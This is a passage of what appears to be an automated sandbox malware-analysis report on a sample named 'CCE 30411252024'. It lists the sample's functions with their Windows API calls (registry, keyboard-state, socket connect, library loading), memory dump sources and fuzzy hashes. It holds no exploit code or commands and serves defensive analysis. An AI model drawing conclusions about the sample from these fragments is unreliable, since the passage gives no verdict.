                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F4E269
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F4E281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3188977179-0
                                                                                        • Opcode ID: 840eb013563524420539a1c42853498a612125efc3392a2bc81ad1fafa21ba8c
                                                                                        • Instruction ID: 61b1de75b4fa29713b2384530299382437eff6ff4dd641dd816dec2ebd585cb5
                                                                                        • Opcode Fuzzy Hash: 840eb013563524420539a1c42853498a612125efc3392a2bc81ad1fafa21ba8c
                                                                                        • Instruction Fuzzy Hash: 35618075E44208AFDB25CF58CC54FBA7BBABF8A310F144059ED5597391C7B1A940EB10
                                                                                        Function 00F21C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F21CB4
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00F21D26
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00F21D81
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F21DF8
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F21E26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        • Opcode ID: c6a565840a21d1acf4fb5f3a68356a4ac79e56acafbdd69749701885fa7a931b
                                                                                        • Instruction ID: e79663b89066ae299c2dcb48c38dad67a3a58fe041b8a366d5f8c2a255818b04
                                                                                        • Opcode Fuzzy Hash: c6a565840a21d1acf4fb5f3a68356a4ac79e56acafbdd69749701885fa7a931b
                                                                                        • Instruction Fuzzy Hash: 9F5167B5A00219EFCB14CF58D880AAAB7B8FF8C314B158559ED59DB300E730EA11CFA4
                                                                                        Function 00F40688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F406EE
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F4077D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F4079B
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F407E1
                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F407FB
                                                                                          • Part of subcall function 00EFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F2A574,?,?,00000000,00000008), ref: 00EFE675
                                                                                          • Part of subcall function 00EFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F2A574,?,?,00000000,00000008), ref: 00EFE699
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 92f4bb1c9b6ecd9ed5235ab1a6eb98c71d6c34aa3f30de3a7630a6ff26e064b6
                                                                                        • Instruction ID: 87b5a85d96ff8d026c67d08482cd6ce081540739e9128681f894f71493ac2d1b
                                                                                        • Opcode Fuzzy Hash: 92f4bb1c9b6ecd9ed5235ab1a6eb98c71d6c34aa3f30de3a7630a6ff26e064b6
                                                                                        • Instruction Fuzzy Hash: 03516975A00249DFCB00EFA8C981DADBBF5BF49320B158055EA15AB362DB70ED46DF81
                                                                                        Function 00F42E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F42EEF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F42F2E
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F42F75
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F42FA1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F42FAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3740051246-0
                                                                                        • Opcode ID: 522b3a8837b501e9411f59ba315ac46042a3081b048a5aca1405304867df09ad
                                                                                        • Instruction ID: 50610d4b494df435ce7f8b192fa59ab03467c7ef33bd8d19b9100973b124feb7
                                                                                        • Opcode Fuzzy Hash: 522b3a8837b501e9411f59ba315ac46042a3081b048a5aca1405304867df09ad
                                                                                        • Instruction Fuzzy Hash: 32514B71608244AFD704EF54CC81E6ABBF9BF88314F50482DF95597291DB70E909DB52
                                                                                        Function 00F4CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72c8aa616116f012d3b99d089a3b5838c03926e05b26240c77db26d980a599f0
                                                                                        • Instruction ID: 8d491593f4c4ae4ba77d886145035d32834e6ff3a301cadb4656f8b0358ee6fa
                                                                                        • Opcode Fuzzy Hash: 72c8aa616116f012d3b99d089a3b5838c03926e05b26240c77db26d980a599f0
                                                                                        • Instruction Fuzzy Hash: 7941C37AE02118ABD760DF68CC44FA9BF78EB09360F151125ED69A72E1C770AD01FAD0
                                                                                        Function 00F31206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F312B4
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F312DD
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F3131C
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F31341
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F31349
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 1bf7f5bebfddf401607ecfccd60000aac3944e8963e17fcf53500962475fd934
                                                                                        • Instruction ID: e670afafa0d55e05ae5ecbea33f8c8b20d6fc7a6c71d67cfbf0905d98df17f08
                                                                                        • Opcode Fuzzy Hash: 1bf7f5bebfddf401607ecfccd60000aac3944e8963e17fcf53500962475fd934
                                                                                        • Instruction Fuzzy Hash: CD411B35A00149DFCF01EF65C991AAEBBF5FF48310B149099E90AAB3A2DB31ED01DB50
                                                                                        Function 00EFB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 451838dec4a5b900abc0e2cc9be6a405c94eaac8984850179a31c815854af151
                                                                                        • Instruction ID: 22aae6ae5ce82cb22a8dea1cf16b21975aad57d81f517674476aa24b06cc4a5b
                                                                                        • Opcode Fuzzy Hash: 451838dec4a5b900abc0e2cc9be6a405c94eaac8984850179a31c815854af151
                                                                                        • Instruction Fuzzy Hash: E3416D31A04119FBDF299F64CC44AE9BBB4FF05365F104359F929A6290CB30AD94EFA1
                                                                                        Function 00F1B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00F1B369
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00F1B413
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F1B41B
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00F1B429
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F1B431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 613f2aa9072f238f07a05158d002b7d9a35c3fc61d8ea46259582eccf3e5c208
                                                                                        • Instruction ID: dd91ded4b0876b299f9695d2b80ace70102206195274814a2dbefa5926ce4e1f
                                                                                        • Opcode Fuzzy Hash: 613f2aa9072f238f07a05158d002b7d9a35c3fc61d8ea46259582eccf3e5c208
                                                                                        • Instruction Fuzzy Hash: 7A31AE7190021DEBDF14CFA8DD4DADE7BB5EB04325F108229F931AA1D1C3B199A4EB91
                                                                                        Function 00F1DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 00F1DBD7
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F1DBF4
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F1DC2C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F1DC52
                                                                                        • _wcsstr.LIBCMT ref: 00F1DC5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: c78ebd92bdc1610fe68a8efdbc1ac246809fd9de503c86ba082346b4d74cf5f8
                                                                                        • Instruction ID: bc7a8e600438f8bc9c923fc2009b35b4107fd31c999b00d5d1f9acff734b0822
                                                                                        • Opcode Fuzzy Hash: c78ebd92bdc1610fe68a8efdbc1ac246809fd9de503c86ba082346b4d74cf5f8
                                                                                        • Instruction Fuzzy Hash: 24212972604104BBEB159F39DC49EBB7BB8DF45760F104039F909DA191EBA6DC81F6A0
                                                                                        Function 00F4DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4DEB0
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F4DED4
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F4DEEC
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00F4DF14
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00F33A1E,00000000), ref: 00F4DF32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 6bb54b2bd8e2de0f56065f17ec546077b4047e942bdc9215f7e243c70c10afc0
                                                                                        • Instruction ID: 8adcfcb84fdf1d5b50bef6977c3ee19632dfdc29c7c8e2ae5a9299451dc65281
                                                                                        • Opcode Fuzzy Hash: 6bb54b2bd8e2de0f56065f17ec546077b4047e942bdc9215f7e243c70c10afc0
                                                                                        • Instruction Fuzzy Hash: AD219071A11216AFCB208F78CC44B6A3B94FB15334F150724FD26CB6E0E7709850AB80
                                                                                        Function 00F1BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F1BC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F1BCC2
                                                                                        • __itow.LIBCMT ref: 00F1BCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F1BD00
                                                                                        • __itow.LIBCMT ref: 00F1BD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: c05c4c6ab9533a173a1426cd37d354d974908e4369dd55ed21d4ab3bc9948f50
                                                                                        • Instruction ID: a6fa4d7e3256801645848b82432dd7a6319781833284c90c67813461055bacb5
                                                                                        • Opcode Fuzzy Hash: c05c4c6ab9533a173a1426cd37d354d974908e4369dd55ed21d4ab3bc9948f50
                                                                                        • Instruction Fuzzy Hash: A8210836B00208FBDB14AF659C86FDE7BA8AF5D350F001024FA09EB181DB75C985A3E1
                                                                                        Function 00F26318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE50E6: _wcsncpy.LIBCMT ref: 00EE50FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00F260C3), ref: 00F26369
                                                                                        • GetLastError.KERNEL32(?,?,?,00F260C3), ref: 00F26374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F260C3), ref: 00F26388
                                                                                        • _wcsrchr.LIBCMT ref: 00F263AA
                                                                                          • Part of subcall function 00F26318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F260C3), ref: 00F263E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: 7bcc68c4e8f07f922ece46e12375787ea4f61f552ba0821ae0d1d4358f6e8b08
                                                                                        • Instruction ID: 346f9e9e3b3ddd555c8a6cdda9aa7d9202d811cf0f432a498e16e78a7fa4246c
                                                                                        • Opcode Fuzzy Hash: 7bcc68c4e8f07f922ece46e12375787ea4f61f552ba0821ae0d1d4358f6e8b08
                                                                                        • Instruction Fuzzy Hash: DD210831E052294AEB21EB74BC52FEA33ACEF05370F200065F055D32C0EBA4DD80BA64
                                                                                        Function 00F38B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F3A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00F3A84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F38BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00F38BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00F38BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: 193d6fadaeb3411357fb310e86349e0009e5f2b4497add5e1b5c523eeb98beb3
                                                                                        • Instruction ID: d91a33e3999dd43b11fd8aa97d213419d63a967388e3118f066b004ddfc33b69
                                                                                        • Opcode Fuzzy Hash: 193d6fadaeb3411357fb310e86349e0009e5f2b4497add5e1b5c523eeb98beb3
                                                                                        • Instruction Fuzzy Hash: 352193317002189FCB10AF68DD45F7D77E9AF48760F045459FA56A72D2CBB8AC02A761
                                                                                        Function 00F38420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00F38441
                                                                                        • GetForegroundWindow.USER32 ref: 00F38458
                                                                                        • GetDC.USER32(00000000), ref: 00F38494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00F384A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00F384DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 2471f24ed86cc157d0ba1eb0da82bd552e4fea9ddb5f4e51f92204459fb25255
                                                                                        • Instruction ID: e949c8373186a49628bdf326b0aa61386b094455cd3ad052bebec01d42947099
                                                                                        • Opcode Fuzzy Hash: 2471f24ed86cc157d0ba1eb0da82bd552e4fea9ddb5f4e51f92204459fb25255
                                                                                        • Instruction Fuzzy Hash: AA21C335B00208AFD700DFA5DC85AAEBBF9EF48351F048479F95A97251CB74AC01EB60
                                                                                        Function 00EFAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                        • BeginPath.GDI32(?), ref: 00EFB009
